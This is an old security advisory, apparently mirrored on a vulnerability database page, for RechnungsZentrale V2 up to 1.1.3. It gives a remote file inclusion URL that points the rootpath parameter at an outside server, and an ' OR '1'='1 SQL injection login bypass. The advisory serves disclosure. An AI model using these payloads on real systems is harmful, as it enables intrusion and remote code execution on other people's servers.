Lucene search

RechnungsZentrale V2 <= 1.1.3 Remote Inclusion Vulnerability

🗓️ 19 Apr 2006 00:00:00Reported by GroundZero SecurityType

zdt🔗 0day.today👁 186 Views

RechnungsZentrale V2 <= 1.1.3 Remote Inclusion Vulnerabilit

============================================================
RechnungsZentrale V2 <= 1.1.3 Remote Inclusion Vulnerability
============================================================





- GroundZero Security Research and Software Development 2006                     -

   Software:   RechnungsZentrale V2
   Version:    1.1.3, likely older versions are affected aswell.
   Vendor:     http://www.nfec.de/
   
   Remote Inclusion:
       http://www.victim.tld/mod/authent.php4?rootpath=Http://server.tld/mod/db.php4
   
   SQL Injection:
       User: ' OR '1'='1
       Password: 1   
   
- Bugs discovered by GroundZero Security Research and Software Development       -




#  0day.today [2018-03-16]  #

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

19 Apr 2006 00:00Current

7.1High risk

Vulners AI Score7.1